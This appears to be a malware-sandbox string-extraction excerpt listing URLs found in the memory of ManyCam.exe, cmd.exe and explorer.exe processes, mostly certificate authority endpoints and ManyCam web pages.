Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ManyCam.exe, 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000003.1723593860.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1780128540.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2086046068.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198807408.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://download.manycam.com
Source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://download.manycam.com/effects/%s/%s?v=%sBackgroundsDynamicDynamic
Source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://download.manycam.com/effects/%s/%s?v=%sManyCam
Source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://download.manycam.comNew
Source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://download.manycam.comVerdanaThis
Source: ManyCam.exe	String found in binary or memory: http://manycam.com/feedback/?version=%s
Source: ManyCam.exe, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://manycam.com/help/effects
Source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://manycam.com/upload_effect?filepath=ManyCam
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: ManyCam.exe, 00000002.00000002.1728202341.0000000004155000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003D58000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004CC8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.00000000028CD000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.000000000415C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004A99000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D43000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.0000000005866000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C54000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: ManyCam.exe, ManyCam.exe, 00000004.00000002.1780128540.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2086046068.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198807408.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://www.manycam.com
Source: ManyCam.exe, ManyCam.exe, 00000004.00000002.1780128540.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2086046068.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198807408.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://www.manycam.com/codec
Source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://www.manycam.com/codecVerdanaThis
Source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://www.manycam.com/codecVerdanaTo
Source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://www.manycam.com/help/effects/snapshot/these
Source: ManyCam.exe, 00000002.00000003.1722253839.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000003.1723593860.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000003.1721444923.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, cximagecrt.dll.2.dr, ManyCam.exe.2.dr	String found in binary or memory: http://www.manycam.com0
Source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	String found in binary or memory: http://www.manycam.comhttp://manycam.com/feedback/?version=%sAnchor
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
